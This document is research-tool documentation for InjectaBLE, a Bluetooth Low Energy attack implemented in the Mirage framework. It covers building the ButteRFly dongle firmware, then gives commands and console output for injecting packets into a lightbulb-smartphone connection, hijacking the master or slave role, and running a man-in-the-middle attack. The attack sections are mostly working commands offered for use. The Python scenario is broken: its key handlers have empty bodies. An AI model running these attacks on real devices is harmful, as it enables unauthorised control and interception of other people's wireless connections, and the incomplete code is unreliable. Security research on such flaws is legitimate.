InjectaBLE attacks

In 2021, we published two papers describing a new Bluetooth Low Energy attack, named InjectaBLE, allowing to inject malicious traffic into an established BLE connection.

Compiling and flashing the ButteRFly firmware

Mirage (v1.2) adds support for a new device, based on nRF52840 dongle and named ButteRFly, allowing to perform this attack. The corresponding firmware is open-source and can be downloaded here To setup this device, you have to follow these instructions:

  • Install the latest ARM GCC Toolchain (C++ support needed), add it to your PATH variable

  • Download the latest NRF5 SDK from nordic semiconductors

  • Install nrfutil and add it to your PATH variable

  • Set the SDK_ROOT environment variable to match the SDK directory

Compiling the firmware is straightforward:

$ make

Then, you can use the send command to flash it on the dongle:

$ make send

The dongle should now be detected by your operating system:

$ lsusb
Bus 001 Device 039: ID 5a17:0000 Mirage Toolkit ButteRFly

You are now ready to try the InjectaBLE proofs of concept !

Injecting packets into an established connection

You can use Mirage framework to interact with the dongle and perform injection attacks. These attacks are based on a race condition, due to the fact that the Slave has to extend its listening time when it receives a Master packet because of clocks desynchronization. Then, if the attacker injects a packet before the legitimate Master, the Slave will accept the injected packet.


You can easily try this attack thanks to ble_sniff module. For example, let’s imagine you want to inject packets into a Bluetooth Low Energy connection between a lightbulb and a smartphone. You know that the following packets allow to turn the bulb on or off:

  • Write command | handle = 0x0021 | data = 5510010d0a: turn the bulb on

  • Write command | handle = 0x0021 | data = 5510000d0a: turn the bulb off

You can write the following scenario, which will inject the “on” packet when the up arrow key is pressed and the “off” packet when the down arrow key is pressed:

from mirage.core import scenario
from mirage.libs import io,ble,utils

class lightbulb_injection(scenario.Scenario):

        def onStart(self):
                self.emitter = self.module.getEmitter(self.module["INTERFACE"])

        def onKey(self,key):
                if key == "up":
                elif key == "down":
  • Save this scenario as in the scenarios folder.

  • Run the ble_sniff module with the following parameters:

$ sudo mirage ble_sniff SNIFFING_MODE=newConnections SCENARIO=lightbulb_injection INTERFACE=butterfly0
[INFO] Module ble_sniff loaded !
[SUCCESS] ButteRFly device successfully instantiated !
[INFO] Scenario loaded !
[PACKET] [ CH:37|CLK:81046388.0|RSSI:0dBm ] << BLE - Advertisement Packet | type=CONNECT_REQ | srcAddr=5F:FB:09:F2:AB:3F | dstAddr=74:DA:EA:91:47:E3 | accessAddress=0x6254e35c| crcInit=0x8d0b2d| channelMap=0x1fffe007ff| hopInterval=36| hopIncrement=14 >>

┌Sniffed Connection─────────┬──────────────┬──────────────┬───────────────┐
│ Access Address │ CRCInit  │ Channel Map  │ Hop Interval │ Hop Increment │
│ 0x5ce35462     │ 0x2d0b8d │ 0x1fffe007ff │ 36           │ 14            │
[PACKET] [ CH:24|CLK:81076014.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_FEATURE_REQ | data=ff7d000000000000 >>
[PACKET] [ CH:28|CLK:81121245.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_FEATURE_RSP | data=0100000000000000 >>
[PACKET] [ CH:21|CLK:82298767.0|RSSI:0dBm ] << BLE - Find Information Response Packet | format=0x1 | data=4100022942000129 >>
[PACKET] [ CH:35|CLK:82306036.0|RSSI:0dBm ] << BLE - Find Information Request Packet >>
[PACKET] [ CH:22|CLK:82313767.0|RSSI:0dBm ] << BLE - Error Response Packet | req=0x4 | handle=0x43 | ecode=0xa >>
[PACKET] [ CH:26|CLK:82321037.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_CONNECTION_UPDATE_REQ | data=011e0024000000f4016900 >>
^[[A[INFO] Starting injection attack: injecting ...
[SUCCESS] Injection successful after 17 attempts !
^[[B[INFO] Starting injection attack: injecting ...
[SUCCESS] Injection successful after 4 attempts !
  • Establish the connection between the smartphone and the lightbulb: when you are synchronized with the connection, you can simply inject the previously mentioned packets by pressing up or down arrows keys.

Hijacking the Master role (experimental)

InjectaBLE allows to perform master hijacking attacks by injecting a LL_CONNECTION_UPDATE_IND packet and synchronize with the Slave when the Slave changes its connection parameters. Indeed, from the Slave’s perspective, the LL_CONNECTION_UPDATE_IND indicates that the connection parameters have to be updated, however the legitimate Master didn’t plan this update and will continue to use old connection parameters.


You can perform this kind of attacks by combining ble_hijack and ble_master modules:

$ sudo mirage "ble_hijack|ble_master" ble_hijack1.INTERFACE=butterfly0 ble_hijack1.HIJACKING_MODE=newConnections ble_hijack1.ROLE=master
[INFO] Module ble_hijack loaded !
[INFO] Module ble_master loaded !
[SUCCESS] ButteRFly device successfully instantiated !
[PACKET] [ CH:37|CLK:177250429.0|RSSI:0dBm ] << BLE - Advertisement Packet | type=CONNECT_REQ | srcAddr=5F:FB:09:F2:AB:3F | dstAddr=74:DA:EA:91:47:E3 | accessAddress=0x622ad17b| crcInit=0x96ce62| channelMap=0x1fffe007ff| hopInterval=36| hopIncrement=7 >>

┌Sniffed Connection─────────┬──────────────┬──────────────┬───────────────┐
│ Access Address │ CRCInit  │ Channel Map  │ Hop Interval │ Hop Increment │
│ 0x7bd12a62     │ 0x62ce96 │ 0x1fffe007ff │ 36           │ 7             │
[INFO] Attack started in 5 seconds...
[PACKET] [ CH:7|CLK:177287538.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_FEATURE_REQ | data=ff7d000000000000 >>
[PACKET] [ CH:24|CLK:177332770.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_FEATURE_RSP | data=0100000000000000 >>
[PACKET] [ CH:30|CLK:178540292.0|RSSI:0dBm ] << BLE - Error Response Packet | req=0x4 | handle=0x43 | ecode=0xa >>
[PACKET] [ CH:27|CLK:178547562.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_CONNECTION_UPDATE_REQ | data=01120024000000f4016b00 >>
[PACKET] [ CH:8|CLK:179537580.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_CHANNEL_MAP_REQ | data=ff07e0ff1f8800 >>
[INFO] Starting Master Hijacking attack: injecting LL_CONNECTION_UPDATE_REQ...
[SUCCESS] Injection successful after 2 attempts !
[INFO] Waiting for connection update instant...
[SUCCESS] Attack successful !
[INFO] SubInterface available: butterfly0:sub0 (master)
[INFO] Instantiating subdevice :butterfly0:sub0
[MASTER|0x7bd12a62]: write_cmd 0x0021 5510010d0a
[SUCCESS] Write Command : handle = 0x0021 / value = 5510010d0a

Then, if the attack is successful you can interact with the lightbulb as if you connected directly to it using ble_master module.


This attack is experimental and may be unstable depending on the targeted device.

Hijacking the Slave role (experimental)

InjectaBLE allows to perform slave hijacking attacks by injecting a LL_TERMINATE_IND packet and synchronize with the Master when the Slave disconnects.


You can perform this kind of attacks by combining ble_hijack and ble_slave modules:

$ sudo mirage "ble_hijack|ble_slave" ble_hijack1.INTERFACE=butterfly0 ble_hijack1.HIJACKING_MODE=newConnections ble_hijack1.ROLE=slave
[sudo] Mot de passe de rcayre :
[INFO] Module ble_hijack loaded !
[INFO] Module ble_slave loaded !
[SUCCESS] ButteRFly device successfully instantiated !
[PACKET] [ CH:37|CLK:158609287.0|RSSI:0dBm ] << BLE - Advertisement Packet | type=CONNECT_REQ | srcAddr=5B:F0:E9:8F:91:46 | dstAddr=74:DA:EA:91:47:E3 | accessAddress=0x9e25da8b| crcInit=0x832bb3| channelMap=0x1fffe007ff| hopInterval=36| hopIncrement=9 >>

┌Sniffed Connection─────────┬──────────────┬──────────────┬───────────────┐
│ Access Address │ CRCInit  │ Channel Map  │ Hop Interval │ Hop Increment │
│ 0x8bda259e     │ 0xb32b83 │ 0x1fffe007ff │ 36           │ 9             │
[INFO] Attack started in 5 seconds...
[PACKET] [ CH:9|CLK:158638763.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_FEATURE_REQ | data=ff7d000000000000 >>
[PACKET] [ CH:23|CLK:161293813.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_CHANNEL_MAP_REQ | data=ff01e0ff1f8d00 >>
[INFO] Starting Master Hijacking attack: injecting LL_TERMINATE_IND...
[SUCCESS] Attack successful !
[INFO] SubInterface available: butterfly0:sub1 (slave)
[INFO] Instantiating subdevice :butterfly0:sub1
[INFO] No filename provided : empty database !

Then, if the attack is successful you can interact with the smartphone using ble_master module.


This attack is experimental and may be unstable depending on the targeted device.

Performing an injection-based Man-in-the-Middle attack (experimental)

InjectaBLE allows to perform MiTM attacks by injecting a LL_CONNECTION_UPDATE_IND packet and synchronize with both legitimate devices when the Slave changes its connection parameters. Indeed, from the Slave’s perspective, the LL_CONNECTION_UPDATE_IND indicates that the connection parameters have to be updated, however the legitimate Master didn’t plan this update and will continue to use old connection parameters.


You can perform this kind of attacks using ble_mitm module as follows:

$ sudo mirage ble_mitm INTERFACE=butterfly0 MITM_STRATEGY=injection
[INFO] Module ble_mitm loaded !
[SUCCESS] ButteRFly device successfully instantiated !
[PACKET] [ CH:37|CLK:4251857.0|RSSI:0dBm ] << BLE - Advertisement Packet | type=CONNECT_REQ | srcAddr=61:A6:C4:B4:DE:BD | dstAddr=74:DA:EA:91:47:E3 | accessAddress=0x7257ddc4| crcInit=0x978537| channelMap=0x1fffe007ff| hopInterval=36| hopIncrement=8 >>

┌Sniffed Connection─────────┬──────────────┬──────────────┬───────────────┐
│ Access Address │ CRCInit  │ Channel Map  │ Hop Interval │ Hop Increment │
│ 0xc4dd5772     │ 0x378597 │ 0x1fffe007ff │ 36           │ 8             │
[INFO] Attack started in 7 seconds...
[PACKET] [ CH:8|CLK:4274594.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_FEATURE_REQ | data=ff7d000000000000 >>
[PACKET] [ CH:30|CLK:6884638.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_CHANNEL_MAP_REQ | data=ff07f8ff1f8c00 >>
[PACKET] [ CH:24|CLK:9404673.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_CHANNEL_MAP_REQ | data=ff07e0ff1fc600 >>
[INFO] Starting MiTM attack: injecting LL_CONNECTION_UPDATE_REQ...
[SUCCESS] Injection successful after 12 attempts !
[INFO] Waiting for connection update instant...
[SUCCESS] Attack successful !
[INFO] SubInterfaces available: butterfly0:sub0 (master) and butterfly0:sub1 (slave)
[INFO] Instantiating subdevice :butterfly0:sub0
[INFO] Instantiating subdevice :butterfly0:sub1
[INFO] Read Request (from master) : handle = 0x3
[INFO] Redirecting to slave ...
[INFO] Read Response (from slave) : value =
[INFO] Redirecting to master ...

Then, if the attack is successful you can interact with both devices, dropping or altering the packets, etc. Please refer to the documentation of ble_mitm module for more details.


This attack is experimental and may be unstable depending on the targeted device.